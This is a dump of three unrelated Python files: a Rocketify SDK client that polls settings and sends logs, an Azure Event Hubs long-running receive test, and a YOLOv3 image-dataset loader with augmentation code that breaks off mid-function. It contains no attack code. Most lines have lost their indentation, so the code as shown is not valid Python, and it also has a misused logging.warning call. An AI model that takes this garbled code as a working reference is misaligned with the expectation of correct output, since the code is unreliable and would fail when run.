__init__.py
import copy
import pickle
import threading
import requests
import logging
from typing import List
from rocketify_sdk import EventHook
from rocketify_sdk.IntervalRunner import IntervalRunner
class Sdk:
def __init__(self,
api_key: str,
polling_interval_seconds: int = 5,
debug: bool = False,
base_url: str = "https://api.rocketify.app"
):
if not api_key:
raise Exception("Please provide an api key")
self.api_key = api_key
self.polling_interval_seconds = polling_interval_seconds
self.debug = debug
self.base_url = base_url
self._config = None
self.on_config_updated = EventHook.EventHook()
self.on_action = EventHook.EventHook()
self._interval_runners: List[IntervalRunner] = []
self._stopped = False
def _raise_on_stopped(self):
if self._stopped:
raise Exception("This sdk has been stopped")
def _debug(self, msg):
if self.debug:
logging.warning(msg)
def _update_settings(self):
try:
res = requests.get("%s/apps/sdk/settings" % self.base_url, headers={"Authorization": self.api_key})
res.raise_for_status()
prev_config = self._config
new_config = res.json()
if pickle.dumps(prev_config) != pickle.dumps(new_config):
self.on_config_updated.fire(new_config)
self._config = new_config
except requests.RequestException as e:
            if e.response is not None and e.response.status_code == 403:
raise e
self._debug("Error while updating settings: %s" % str(e))
except Exception as e:
self._debug("Error while updating settings: %s" % str(e))
def _log(self, message: str, log_type: str):
try:
payload = {
"message": message,
"type": log_type,
}
res = requests.post(
"%s/apps/log" % self.base_url, headers={"Authorization": self.api_key}, json=payload)
res.raise_for_status()
except Exception as e:
self._debug("Error while sending log: %s" % str(e))
logging.warning("Could not log message", str(e))
def log(self, message: str, log_type: str = "info"):
self._raise_on_stopped()
if not message:
raise Exception("Cannot send an empty message")
if log_type not in ["error", "info", "warn", "success"]:
raise Exception("Invalid log type %s" % log_type)
if log_type == "error":
logging.error(message)
elif log_type == "warn":
logging.warning(message)
else:
logging.info(message)
self._debug("Sending log: %s %s" % (message, log_type))
thread = threading.Thread(target=self._log, name="RemoteLog", args=[message, log_type])
thread.start()
def init(self):
self._raise_on_stopped()
self._update_settings()
self._interval_runners.append(IntervalRunner(self._update_settings, self.polling_interval_seconds))
def stop(self):
self._debug("stopping")
self.on_config_updated.clear_handlers()
self.on_action.clear_handlers()
for thread in self._interval_runners:
thread.cancel()
def get_config(self):
return copy.deepcopy(self._config)
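# Usage sketch (illustrative only, not part of the SDK):
def _example_usage():
    sdk = Sdk(api_key="YOUR_API_KEY", polling_interval_seconds=10, debug=True)
    # Handler registration depends on EventHook's API (not shown in this file);
    # `+=` is a common EventHook convention and is only an assumption here:
    # sdk.on_config_updated += lambda config: print("config changed:", config)
    sdk.init()                  # fetch settings once, then keep polling in the background
    sdk.log("service started")  # defaults to log_type="info"
    print(sdk.get_config())     # deep copy of the last fetched settings
    sdk.stop()                  # cancel polling and clear event handlers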
test_longrunning_receive.py
#!/usr/bin/env python
# --------------------------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See License.txt in the project root for license information.
# --------------------------------------------------------------------------------------------
"""
receive test.
"""
import logging
import argparse
import time
import os
import sys
import threading
import pytest
from logging.handlers import RotatingFileHandler
from azure.eventhub import EventPosition
from azure.eventhub import EventHubClient
from azure.eventhub import EventHubSharedKeyCredential
def get_logger(filename, level=logging.INFO):
azure_logger = logging.getLogger("azure.eventhub")
azure_logger.setLevel(level)
uamqp_logger = logging.getLogger("uamqp")
uamqp_logger.setLevel(logging.INFO)
formatter = logging.Formatter('%(asctime)s %(name)-12s %(levelname)-8s %(message)s')
console_handler = logging.StreamHandler(stream=sys.stdout)
console_handler.setFormatter(formatter)
if not azure_logger.handlers:
azure_logger.addHandler(console_handler)
if not uamqp_logger.handlers:
uamqp_logger.addHandler(console_handler)
if filename:
file_handler = RotatingFileHandler(filename, maxBytes=20*1024*1024, backupCount=3)
file_handler.setFormatter(formatter)
azure_logger.addHandler(file_handler)
uamqp_logger.addHandler(file_handler)
return azure_logger
logger = get_logger("recv_test.log", logging.INFO)
def pump(receiver, duration):
total = 0
iteration = 0
deadline = time.time() + duration
with receiver:
try:
while time.time() < deadline:
batch = receiver.receive(timeout=5)
size = len(batch)
total += size
iteration += 1
if size == 0:
print("{}: No events received, queue size {}, delivered {}".format(
receiver.partition,
receiver.queue_size,
total))
elif iteration >= 5:
iteration = 0
print("{}: total received {}, last sn={}, last offset={}".format(
receiver.partition,
total,
batch[-1].sequence_number,
batch[-1].offset))
print("{}: Total received {}".format(receiver.partition, total))
except Exception as e:
print("EventHubConsumer failed: {}".format(e))
raise
@pytest.mark.liveTest
def test_long_running_receive(connection_str):
parser = argparse.ArgumentParser()
parser.add_argument("--duration", help="Duration in seconds of the test", type=int, default=30)
parser.add_argument("--consumer", help="Consumer group name", default="$default")
parser.add_argument("--partitions", help="Comma seperated partition IDs")
parser.add_argument("--offset", help="Starting offset", default="-1")
parser.add_argument("--conn-str", help="EventHub connection string", default=connection_str)
parser.add_argument("--eventhub", help="Name of EventHub")
parser.add_argument("--address", help="Address URI to the EventHub entity")
parser.add_argument("--sas-policy", help="Name of the shared access policy to authenticate with")
parser.add_argument("--sas-key", help="Shared access key")
args, _ = parser.parse_known_args()
if args.conn_str:
client = EventHubClient.from_connection_string(
args.conn_str,
event_hub_path=args.eventhub, network_tracing=False)
elif args.address:
client = EventHubClient(host=args.address,
event_hub_path=args.eventhub,
credential=EventHubSharedKeyCredential(args.sas_policy, args.sas_key),
auth_timeout=240,
network_tracing=False)
else:
        pytest.skip("Must specify either '--conn-str' or '--address'")
if args.partitions:
partitions = args.partitions.split(",")
else:
partitions = client.get_partition_ids()
threads = []
for pid in partitions:
        consumer = client.create_consumer(consumer_group=args.consumer,
partition_id=pid,
event_position=EventPosition(args.offset),
prefetch=300)
thread = threading.Thread(target=pump, args=(consumer, args.duration))
thread.start()
threads.append(thread)
for thread in threads:
thread.join()
if __name__ == '__main__':
test_long_running_receive(os.environ.get('EVENT_HUB_PERF_CONN_STR'))
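# Example standalone invocation (assumes EVENT_HUB_PERF_CONN_STR is set in the
# environment, or pass --conn-str explicitly):
#   python test_longrunning_receive.py --duration 60 --partitions 0,1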
datasets.py
import glob
import math
import os
import random
import shutil
import time
from pathlib import Path
from threading import Thread
import cv2
import numpy as np
import torch
from PIL import Image, ExifTags
from torch.utils.data import Dataset
from tqdm import tqdm
from .utils import xyxy2xywh, xywh2xyxy
help_url = 'https://github.com/ultralytics/yolov3/wiki/Train-Custom-Data'
img_formats = ['.bmp', '.jpg', '.jpeg', '.png', '.tif', '.dng']
vid_formats = ['.mov', '.avi', '.mp4', '.mpg', '.mpeg', '.m4v', '.wmv', '.mkv']
# Get orientation exif tag
for orientation in ExifTags.TAGS.keys():
if ExifTags.TAGS[orientation] == 'Orientation':
break
def exif_size(img):
# Returns exif-corrected PIL size
s = img.size # (width, height)
try:
rotation = dict(img._getexif().items())[orientation]
if rotation == 6: # rotation 270
s = (s[1], s[0])
elif rotation == 8: # rotation 90
s = (s[1], s[0])
except:
pass
return s
class LoadImages: # for inference
def __init__(self, path, img_size=416):
path = str(Path(path)) # os-agnostic
files = []
if os.path.isdir(path):
files = sorted(glob.glob(os.path.join(path, '*.*')))
elif os.path.isfile(path):
files = [path]
images = [x for x in files if os.path.splitext(x)[-1].lower() in img_formats]
videos = [x for x in files if os.path.splitext(x)[-1].lower() in vid_formats]
nI, nV = len(images), len(videos)
self.img_size = img_size
self.files = images + videos
self.nF = nI + nV # number of files
self.video_flag = [False] * nI + [True] * nV
self.mode = 'images'
if any(videos):
self.new_video(videos[0]) # new video
else:
self.cap = None
assert self.nF > 0, 'No images or videos found in %s. Supported formats are:\nimages: %s\nvideos: %s' % \
(path, img_formats, vid_formats)
def __iter__(self):
self.count = 0
return self
def __next__(self):
if self.count == self.nF:
raise StopIteration
path = self.files[self.count]
if self.video_flag[self.count]:
# Read video
self.mode = 'video'
ret_val, img0 = self.cap.read()
if not ret_val:
self.count += 1
self.cap.release()
if self.count == self.nF: # last video
raise StopIteration
else:
path = self.files[self.count]
self.new_video(path)
ret_val, img0 = self.cap.read()
self.frame += 1
print('video %g/%g (%g/%g) %s: ' % (self.count + 1, self.nF, self.frame, self.nframes, path), end='')
else:
# Read image
self.count += 1
img0 = cv2.imread(path) # BGR
assert img0 is not None, 'Image Not Found ' + path
print('image %g/%g %s: ' % (self.count, self.nF, path), end='')
# Padded resize
img = letterbox(img0, new_shape=self.img_size)[0]
# Convert
img = img[:, :, ::-1].transpose(2, 0, 1) # BGR to RGB, to 3x416x416
img = np.ascontiguousarray(img)
# cv2.imwrite(path + '.letterbox.jpg', 255 * img.transpose((1, 2, 0))[:, :, ::-1]) # save letterbox image
return path, img, img0, self.cap
def new_video(self, path):
self.frame = 0
self.cap = cv2.VideoCapture(path)
self.nframes = int(self.cap.get(cv2.CAP_PROP_FRAME_COUNT))
def __len__(self):
return self.nF # number of files
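# Usage sketch for the inference loader above (the sample path and the model
# call are illustrative placeholders, not defined in this file):
def _example_loadimages():
    dataset = LoadImages('data/samples', img_size=416)
    for path, img, img0, vid_cap in dataset:
        img = torch.from_numpy(img).float() / 255.0  # CHW uint8 array -> normalized float tensor
        if img.ndimension() == 3:
            img = img.unsqueeze(0)  # add batch dimension
        # pred = model(img)  # hypothetical detector call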
class LoadWebcam: # for inference
def __init__(self, pipe=0, img_size=416):
self.img_size = img_size
if pipe == '0':
pipe = 0 # local camera
# pipe = 'rtsp://192.168.1.64/1' # IP camera
# pipe = 'rtsp://username:password@192.168.1.64/1' # IP camera with login
# pipe = 'rtsp://170.93.143.139/rtplive/470011e600ef003a004ee33696235daa' # IP traffic camera
# pipe = 'http://wmccpinetop.axiscam.net/mjpg/video.mjpg' # IP golf camera
# https://answers.opencv.org/question/215996/changing-gstreamer-pipeline-to-opencv-in-pythonsolved/
# pipe = '"rtspsrc location="rtsp://username:password@192.168.1.64/1" latency=10 ! appsink' # GStreamer
# https://answers.opencv.org/question/200787/video-acceleration-gstremer-pipeline-in-videocapture/
# https://stackoverflow.com/questions/54095699/install-gstreamer-support-for-opencv-python-package # install help
# pipe = "rtspsrc location=rtsp://root:root@192.168.0.91:554/axis-media/media.amp?videocodec=h264&resolution=3840x2160 protocols=GST_RTSP_LOWER_TRANS_TCP ! rtph264depay ! queue ! vaapih264dec ! videoconvert ! appsink" # GStreamer
self.pipe = pipe
self.cap = cv2.VideoCapture(pipe) # video capture object
self.cap.set(cv2.CAP_PROP_BUFFERSIZE, 3) # set buffer size
def __iter__(self):
self.count = -1
return self
def __next__(self):
self.count += 1
if cv2.waitKey(1) == ord('q'): # q to quit
self.cap.release()
cv2.destroyAllWindows()
raise StopIteration
# Read frame
if self.pipe == 0: # local camera
ret_val, img0 = self.cap.read()
img0 = cv2.flip(img0, 1) # flip left-right
else: # IP camera
n = 0
while True:
n += 1
self.cap.grab()
if n % 30 == 0: # skip frames
ret_val, img0 = self.cap.retrieve()
if ret_val:
break
# Print
assert ret_val, 'Camera Error %s' % self.pipe
img_path = 'webcam.jpg'
print('webcam %g: ' % self.count, end='')
# Padded resize
img = letterbox(img0, new_shape=self.img_size)[0]
# Convert
img = img[:, :, ::-1].transpose(2, 0, 1) # BGR to RGB, to 3x416x416
img = np.ascontiguousarray(img)
return img_path, img, img0, None
def __len__(self):
return 0
class LoadStreams: # multiple IP or RTSP cameras
def __init__(self, sources='streams.txt', img_size=416):
self.mode = 'images'
self.img_size = img_size
if os.path.isfile(sources):
with open(sources, 'r') as f:
sources = [x.strip() for x in f.read().splitlines() if len(x.strip())]
else:
sources = [sources]
n = len(sources)
self.imgs = [None] * n
self.sources = sources
for i, s in enumerate(sources):
# Start the thread to read frames from the video stream
print('%g/%g: %s... ' % (i + 1, n, s), end='')
cap = cv2.VideoCapture(0 if s == '0' else s)
assert cap.isOpened(), 'Failed to open %s' % s
w = int(cap.get(cv2.CAP_PROP_FRAME_WIDTH))
h = int(cap.get(cv2.CAP_PROP_FRAME_HEIGHT))
fps = cap.get(cv2.CAP_PROP_FPS) % 100
_, self.imgs[i] = cap.read() # guarantee first frame
thread = Thread(target=self.update, args=([i, cap]), daemon=True)
print(' success (%gx%g at %.2f FPS).' % (w, h, fps))
thread.start()
print('') # newline
# check for common shapes
s = np.stack([letterbox(x, new_shape=self.img_size)[0].shape for x in self.imgs], 0) # inference shapes
self.rect = np.unique(s, axis=0).shape[0] == 1 # rect inference if all shapes equal
if not self.rect:
print('WARNING: Different stream shapes detected. For optimal performance supply similarly-shaped streams.')
def update(self, index, cap):
# Read next stream frame in a daemon thread
n = 0
while cap.isOpened():
n += 1
# _, self.imgs[index] = cap.read()
cap.grab()
if n == 4: # read every 4th frame
_, self.imgs[index] = cap.retrieve()
n = 0
time.sleep(0.01) # wait time
def __iter__(self):
self.count = -1
return self
def __next__(self):
self.count += 1
img0 = self.imgs.copy()
if cv2.waitKey(1) == ord('q'): # q to quit
cv2.destroyAllWindows()
raise StopIteration
# Letterbox
img = [letterbox(x, new_shape=self.img_size, auto=self.rect)[0] for x in img0]
# Stack
img = np.stack(img, 0)
# Convert
img = img[:, :, :, ::-1].transpose(0, 3, 1, 2) # BGR to RGB, to bsx3x416x416
img = np.ascontiguousarray(img)
return self.sources, img, img0, None
def __len__(self):
return 0 # 1E12 frames = 32 streams at 30 FPS for 30 years
class LoadImagesAndLabels(Dataset): # for training/testing
def __init__(self, path, img_size=416, batch_size=16, augment=False, hyp=None, rect=False, image_weights=False,
cache_images=False, single_cls=False, pad=0.0):
try:
path = str(Path(path)) # os-agnostic
parent = str(Path(path).parent) + os.sep
if os.path.isfile(path): # file
with open(path, 'r') as f:
f = f.read().splitlines()
f = [x.replace('./', parent) if x.startswith('./') else x for x in f] # local to global path
elif os.path.isdir(path): # folder
f = glob.iglob(path + os.sep + '*.*')
else:
raise Exception('%s does not exist' % path)
self.img_files = [x.replace('/', os.sep) for x in f if os.path.splitext(x)[-1].lower() in img_formats]
except:
raise Exception('Error loading data from %s. See %s' % (path, help_url))
n = len(self.img_files)
assert n > 0, 'No images found in %s. See %s' % (path, help_url)
bi = np.floor(np.arange(n) / batch_size).astype(np.int) # batch index
nb = bi[-1] + 1 # number of batches
self.n = n # number of images
self.batch = bi # batch index of image
self.img_size = img_size
self.augment = augment
self.hyp = hyp
self.image_weights = image_weights
self.rect = False if image_weights else rect
self.mosaic = self.augment and not self.rect # load 4 images at a time into a mosaic (only during training)
# Define labels
self.label_files = [x.replace('images', 'labels').replace(os.path.splitext(x)[-1], '.txt')
for x in self.img_files]
# Read image shapes (wh)
sp = path.replace('.txt', '') + '.shapes' # shapefile path
try:
with open(sp, 'r') as f: # read existing shapefile
s = [x.split() for x in f.read().splitlines()]
assert len(s) == n, 'Shapefile out of sync'
except:
s = [exif_size(Image.open(f)) for f in tqdm(self.img_files, desc='Reading image shapes')]
np.savetxt(sp, s, fmt='%g') # overwrites existing (if any)
self.shapes = np.array(s, dtype=np.float64)
# Rectangular Training https://github.com/ultralytics/yolov3/issues/232
if self.rect:
# Sort by aspect ratio
s = self.shapes # wh
ar = s[:, 1] / s[:, 0] # aspect ratio
irect = ar.argsort()
self.img_files = [self.img_files[i] for i in irect]
self.label_files = [self.label_files[i] for i in irect]
self.shapes = s[irect] # wh
ar = ar[irect]
# Set training image shapes
shapes = [[1, 1]] * nb
for i in range(nb):
ari = ar[bi == i]
mini, maxi = ari.min(), ari.max()
if maxi < 1:
shapes[i] = [maxi, 1]
elif mini > 1:
shapes[i] = [1, 1 / mini]
self.batch_shapes = np.ceil(np.array(shapes) * img_size / 32. + pad).astype(np.int) * 32
# Cache labels
self.imgs = [None] * n
self.labels = [np.zeros((0, 5), dtype=np.float32)] * n
create_datasubset, extract_bounding_boxes, labels_loaded = False, False, False
nm, nf, ne, ns, nd = 0, 0, 0, 0, 0 # number missing, found, empty, datasubset, duplicate
np_labels_path = str(Path(self.label_files[0]).parent) + '.npy' # saved labels in *.npy file
if os.path.isfile(np_labels_path):
s = np_labels_path # print string
x = np.load(np_labels_path, allow_pickle=True)
if len(x) == n:
self.labels = x
labels_loaded = True
else:
s = path.replace('images', 'labels')
pbar = tqdm(self.label_files)
for i, file in enumerate(pbar):
if labels_loaded:
l = self.labels[i]
# np.savetxt(file, l, '%g') # save *.txt from *.npy file
else:
try:
with open(file, 'r') as f:
l = np.array([x.split() for x in f.read().splitlines()], dtype=np.float32)
except:
nm += 1 # print('missing labels for image %s' % self.img_files[i]) # file missing
continue
if l.shape[0]:
assert l.shape[1] == 5, '> 5 label columns: %s' % file
assert (l >= 0).all(), 'negative labels: %s' % file
assert (l[:, 1:] <= 1).all(), 'non-normalized or out of bounds coordinate labels: %s' % file
if np.unique(l, axis=0).shape[0] < l.shape[0]: # duplicate rows
nd += 1 # print('WARNING: duplicate rows in %s' % self.label_files[i]) # duplicate rows
if single_cls:
l[:, 0] = 0 # force dataset into single-class mode
self.labels[i] = l
nf += 1 # file found
# Create subdataset (a smaller dataset)
if create_datasubset and ns < 1E4:
if ns == 0:
create_folder(path='./datasubset')
os.makedirs('./datasubset/images')
exclude_classes = 43
if exclude_classes not in l[:, 0]:
ns += 1
# shutil.copy(src=self.img_files[i], dst='./datasubset/images/') # copy image
with open('./datasubset/images.txt', 'a') as f:
f.write(self.img_files[i] + '\n')
# Extract object detection boxes for a second stage classifier
if extract_bounding_boxes:
p = Path(self.img_files[i])
img = cv2.imread(str(p))
h, w = img.shape[:2]
for j, x in enumerate(l):
f = '%s%sclassifier%s%g_%g_%s' % (p.parent.parent, os.sep, os.sep, x[0], j, p.name)
if not os.path.exists(Path(f).parent):
os.makedirs(Path(f).parent) # make new output folder
b = x[1:] * [w, h, w, h] # box
b[2:] = b[2:].max() # rectangle to square
b[2:] = b[2:] * 1.3 + 30 # pad
b = xywh2xyxy(b.reshape(-1, 4)).ravel().astype(np.int)
b[[0, 2]] = np.clip(b[[0, 2]], 0, w) # clip boxes outside of image
b[[1, 3]] = np.clip(b[[1, 3]], 0, h)
assert cv2.imwrite(f, img[b[1]:b[3], b[0]:b[2]]), 'Failure extracting classifier boxes'
else:
ne += 1 # print('empty labels for image %s' % self.img_files[i]) # file empty
# os.system("rm '%s' '%s'" % (self.img_files[i], self.label_files[i])) # remove
pbar.desc = 'Caching labels %s (%g found, %g missing, %g empty, %g duplicate, for %g images)' % (
s, nf, nm, ne, nd, n)
assert nf > 0 or n == 20288, 'No labels found in %s. See %s' % (os.path.dirname(file) + os.sep, help_url)
if not labels_loaded and n > 1000:
print('Saving labels to %s for faster future loading' % np_labels_path)
np.save(np_labels_path, self.labels) # save for next time
# Cache images into memory for faster training (WARNING: large datasets may exceed system RAM)
if cache_images: # if training
gb = 0 # Gigabytes of cached images
pbar = tqdm(range(len(self.img_files)), desc='Caching images')
self.img_hw0, self.img_hw = [None] * n, [None] * n
for i in pbar: # max 10k images
self.imgs[i], self.img_hw0[i], self.img_hw[i] = load_image(self, i) # img, hw_original, hw_resized
gb += self.imgs[i].nbytes
pbar.desc = 'Caching images (%.1fGB)' % (gb / 1E9)
# Detect corrupted images https://medium.com/joelthchao/programmatically-detect-corrupted-image-8c1b2006c3d3
detect_corrupted_images = False
if detect_corrupted_images:
from skimage import io # conda install -c conda-forge scikit-image
for file in tqdm(self.img_files, desc='Detecting corrupted images'):
try:
_ = io.imread(file)
except:
print('Corrupted image detected: %s' % file)
def __len__(self):
return len(self.img_files)
# def __iter__(self):
# self.count = -1
# print('ran dataset iter')
# #self.shuffled_vector = np.random.permutation(self.nF) if self.augment else np.arange(self.nF)
# return self
def __getitem__(self, index):
if self.image_weights:
index = self.indices[index]
hyp = self.hyp
if self.mosaic:
# Load mosaic
img, labels = load_mosaic(self, index)
shapes = None
else:
# Load image
img, (h0, w0), (h, w) = load_image(self, index)
# Letterbox
shape = self.batch_shapes[self.batch[index]] if self.rect else self.img_size # final letterboxed shape
img, ratio, pad = letterbox(img, shape, auto=False, scaleup=self.augment)
shapes = (h0, w0), ((h / h0, w / w0), pad) # for COCO mAP rescaling
# Load labels
labels = []
x = self.labels[index]
if x.size > 0:
# Normalized xywh to pixel xyxy format
labels = x.copy()
labels[:, 1] = ratio[0] * w * (x[:, 1] - x[:, 3] / 2) + pad[0] # pad width
labels[:, 2] = ratio[1] * h * (x[:, 2] - x[:, 4] / 2) + pad[1] # pad height
labels[:, 3] = ratio[0] * w * (x[:, 1] + x[:, 3] / 2) + pad[0]
labels[:, 4] = ratio[1] * h * (x[:, 2] + x[:, 4] / 2) + pad[1]
if self.augment:
# Augment imagespace
if not self.mosaic:
img, labels = random_affine(img, labels,
degrees=hyp['degrees'],
translate=hyp['translate'],
scale=hyp['scale'],
shear=hyp['shear'])
# Augment colorspace
augment_hsv(img, hgain=hyp['hsv_h'], sgain=hyp['hsv_s'], vgain=hyp['hsv_v'])
# Apply cutouts
# if random.random() < 0.9:
# labels = cutout(img, labels)
nL = len(labels) # number of labels
if nL:
# convert xyxy to xywh
labels[:, 1:5] = xyxy2xywh(labels[:, 1:5])
# Normalize coordinates 0 - 1
labels[:, [2, 4]] /= img.shape[0] # height
labels[:, [1, 3]] /= img.shape[1] # width
if self.augment:
# random left-right flip
lr_flip = True
if lr_flip and random.random() < 0.5:
img = np.fliplr(img)
if nL:
labels[:, 1] = 1 - labels[:, 1]
# random up-down flip
ud_flip = False
if ud_flip and random.random() < 0.5:
img = np.flipud(img)
if nL:
labels[:, 2] = 1 - labels[:, 2]
labels_out = torch.zeros((nL, 6))
if nL:
labels_out[:, 1:] = torch.from_numpy(labels)
# Convert
img = img[:, :, ::-1].transpose(2, 0, 1) # BGR to RGB, to 3x416x416
img = np.ascontiguousarray(img)
return torch.from_numpy(img), labels_out, self.img_files[index], shapes
@staticmethod
def collate_fn(batch):
img, label, path, shapes = zip(*batch) # transposed
for i, l in enumerate(label):
l[:, 0] = i # add target image index for build_targets()
return torch.stack(img, 0), torch.cat(label, 0), path, shapes
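# Usage sketch: wiring the dataset into a torch DataLoader with the collate_fn
# above (paths and hyperparameter values are illustrative only):
def _example_dataloader():
    from torch.utils.data import DataLoader
    hyp = {'degrees': 0, 'translate': 0, 'scale': 0, 'shear': 0,
           'hsv_h': 0.014, 'hsv_s': 0.68, 'hsv_v': 0.36}  # illustrative values
    dataset = LoadImagesAndLabels('data/train.txt', img_size=416, batch_size=16,
                                  augment=True, hyp=hyp)
    loader = DataLoader(dataset, batch_size=16, shuffle=True,
                        collate_fn=LoadImagesAndLabels.collate_fn)
    for imgs, targets, paths, shapes in loader:
        # imgs: (bs, 3, H, W) uint8 tensor; targets: (n, 6) rows of [image_idx, cls, x, y, w, h]
        break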
def load_image(self, index):
# loads 1 image from dataset, returns img, original hw, resized hw
img = self.imgs[index]
if img is None: # not cached
path = self.img_files[index]
img = cv2.imread(path) # BGR
assert img is not None, 'Image Not Found ' + path
h0, w0 = img.shape[:2] # orig hw
r = self.img_size / max(h0, w0) # resize image to img_size
if r != 1: # always resize down, only resize up if training with augmentation
interp = cv2.INTER_AREA if r < 1 and not self.augment else cv2.INTER_LINEAR
img = cv2.resize(img, (int(w0 * r), int(h0 * r)), interpolation=interp)
return img, (h0, w0), img.shape[:2] # img, hw_original, hw_resized
else:
return self.imgs[index], self.img_hw0[index], self.img_hw[index] # img, hw_original, hw_resized
def augment_hsv(img, hgain=0.5, sgain=0.5, vgain=0.5):
r = np.random.uniform(-1, 1, 3) * [hgain, sgain, vgain] + 1 # random gains
hue, sat, val = cv2.split(cv2.cvtColor(img, cv2.COLOR_BGR2HSV))
dtype = img.dtype # uint8
x = np.arange(0, 256, dtype=np.int16)
lut_hue = ((x * r[0]) % 180).astype(dtype)
lut_sat = np.clip(x * r[1], 0, 255).astype(dtype)
lut_val = np.clip(x * r[2], 0, 255).astype(dtype)
img_hsv = cv2.merge((cv2.LUT(hue, lut_hue), cv2.LUT(sat, lut_sat), cv2.LUT(val, lut_val))).astype(dtype)
cv2.cvtColor(img_hsv, cv2.COLOR_HSV2BGR, dst=img) # no return needed
# Histogram equalization
# if random.random() < 0.2:
# for i in range(3):
# img[:, :, i] = cv2.equalizeHist(img[:, :, i])
def load_mosaic(self, index):
# loads images in a mosaic
labels4 = []
s = self.img_size
xc, yc = [int(random.uniform(s * 0.5, s * 1.5)) for _ in range(2)] # mosaic center x, y
indices = [index] + [random.randint(0, len(self.labels) - 1) for _ in range(3)] # 3 additional image indices
for i, index in enumerate(indices):
# Load image
img, _, (h, w) = load_image(self, index)
# place img in img4
if i == 0: # top left
img4 = np.full((s * 2, s * 2, img.shape[2]), 114, dtype=np.uint8) # base image with 4 tiles
x1a, y1a, x2a, y2a = max(xc - w, 0), max(yc - h, 0), xc, yc # xmin, ymin, xmax, ymax (large image)
x1b, y1b, x2b, y2b = w - (x2a - x1a), h - (y2a - y1a), w, h # xmin, ymin, xmax, ymax (small image)
elif i == 1: # top right
x1a, y1a, x2a, y2a = xc, max(yc - h, 0), min(xc + w, s * 2), yc
x1b, y1b, x2b, y2b = 0, h - (y2a - y1a), min(w, x2a - x1a), h
elif i == 2: # bottom left
x1a, y1a, x2a, y2a = max(xc - w, 0), yc, xc, min(s * 2, yc + h)
x1b, y1b, x2b, y2b = w - (x2a - x1a), 0, max(xc, w), min(y2a - y1a, h)
elif i == 3: # bottom right
x1a, y1a, x2a, y2a = xc, yc, min(xc + w, s * 2), min(s * 2, yc + h)
x1b, y1b, x2b, y2b = 0, 0, min(w, x2a - x1a), min(y2a - y1a, h)
img4[y1a:y2a, x1a:x2a] = img[y1b:y2b, x1b:x2b] # img4[ymin:ymax, xmin:xmax]
padw = x1a - x1b
padh = y1a - y1b
# Labels
x = self.labels[index]
labels = x.copy()
if x.size > 0: # Normalized xywh to pixel xyxy format
labels[:, 1] = w * (x[:, 1] - x[:, 3] / 2) + padw
labels[:, 2] = h * (x[:, 2] - x[:, 4] / 2) + padh
labels[:, 3] = w * (x[:, 1] + x[:, 3] / 2) + padw
labels[:, 4] = h * (x[:, 2] + x[:, 4] / 2) + padh
labels4.append(labels)
# Concat/clip labels
if len(labels4):
labels4 = np.concatenate(labels4, 0)
# np.clip(labels4[:, 1:] - s / 2, 0, s, out=labels4[:, 1:]) # use with center crop
np.clip(labels4[:, 1:], 0, 2 * s, out=labels4[:, 1:]) # use with random_affine
# Augment
# img4 = img4[s // 2: int(s * 1.5), s // 2:int(s * 1.5)] # center crop (WARNING, requires box pruning)
img4, labels4 = random_affine(img4, labels4,
degrees=self.hyp['degrees'],
translate=self.hyp['translate'],
scale=self.hyp['scale'],
shear=self.hyp['shear'],
border=-s // 2) # border to remove
return img4, labels4
def letterbox(img, new_shape=(416, 416), color=(114, 114, 114), auto=True, scaleFill=False, scaleup=True):
# Resize image to a 32-pixel-multiple rectangle https://github.com/ultralytics/yolov3/issues/232
shape = img.shape[:2] # current shape [height, width]
if isinstance(new_shape, int):
new_shape = (new_shape, new_shape)
# Scale ratio (new / old)
r = min(new_shape[0] / shape[0], new_shape[1] / shape[1])
if not scaleup: # only scale down, do not scale up (for better test mAP)
r = min(r, 1.0)
# Compute padding
ratio = r, r # width, height ratios
new_unpad = int(round(shape[1] * r)), int(round(shape[0] * r))
dw, dh = new_shape[1] - new_unpad[0], new_shape[0] - new_unpad[1] # wh padding
if auto: # minimum rectangle
dw, dh = np.mod(dw, 64), np.mod(dh, 64) # wh padding
elif scaleFill: # stretch
dw, dh = 0.0, 0.0
new_unpad = new_shape
ratio = new_shape[0] / shape[1], new_shape[1] / shape[0] # width, height ratios
dw /= 2 # divide padding into 2 sides
dh /= 2
if shape[::-1] != new_unpad: # resize
img = cv2.resize(img, new_unpad, interpolation=cv2.INTER_LINEAR)
top, bottom = int(round(dh - 0.1)), int(round(dh + 0.1))
left, right = int(round(dw - 0.1)), int(round(dw + 0.1))
img = cv2.copyMakeBorder(img, top, bottom, left, right, cv2.BORDER_CONSTANT, value=color) # add border
return img, ratio, (dw, dh)
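# Worked example with illustrative numbers: letterboxing a 720x1280 (h, w) frame
# to new_shape=416 with the defaults above.
#   r = min(416/720, 416/1280) = 0.325           -> new_unpad = (416, 234)  (w, h)
#   dw, dh = 0, 182; auto=True reduces dh mod 64 -> dh = 54, split as 27 px top/bottom
#   returns a 288x416 image, ratio (0.325, 0.325) and padding (0.0, 27.0);
#   both output dimensions stay multiples of the 32-pixel detector stride.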
def random_affine(img, targets=(), degrees=10, translate=.1, scale=.1, shear=10, border=0):
# torchvision.transforms.RandomAffine(degrees=(-10, 10), translate=(.1, .1), scale=(.9, 1.1), shear=(-10, 10))
# https://medium.com/uruvideo/dataset-augmentation-with-random-homographies-a8f4b44830d4
# targets = [cls, xyxy]
height = img.shape[0] + border * 2
width = img.shape[1] + border * 2
# Rotation and Scale
R = np.eye(3)
a = random.uniform(-degrees, degrees)
# a += random.choice([-180, -90, 0, 90]) # add 90deg rotations to small rotations
s = random.uniform(1 - scale, 1 + scale)
# s = 2 ** random.uniform(-scale, scale)
R[:2] = cv2.getRotationMatrix2D(angle=a, center=(img.shape[1] / 2, img.shape[0] / 2), scale=s)
# Translation
T = np.eye(3)
T[0, 2] = random.uniform(-translate, translate) * img.shape[0] + border # x translation (pixels)
T[1, 2] = random.uniform(-translate, translate) * img.shape[1] + border # y translation (pixels)
# Shear
S = np.eye(3)
S[0, 1] = math.tan(random.uniform(-shear, shear) * math.pi / 180) # x shear (deg)
S[1, 0] = math.tan(random.uniform(-shear, shear) * math.pi / 180) # y shear (deg)
# Combined rotation matrix
M = S @ T @ R # ORDER IS IMPORTANT HERE!!
if (border != 0) or (M != np.eye(3)).any(): # image changed
img = cv2.warpAffine(img, M[:2], dsize=(width, height), flags=cv2.INTER_LINEAR, borderValue=(114, 114, 114))
# Transform label coordinates
n = len(targets)
if n:
# warp points
xy = np.ones((n * 4, 3))
xy[:, :2] = targets[:, [1, 2, 3, 4, 1, 4, 3, 2]].reshape(n * 4, 2) # x1y1, x2y2, x1y2, x2y1
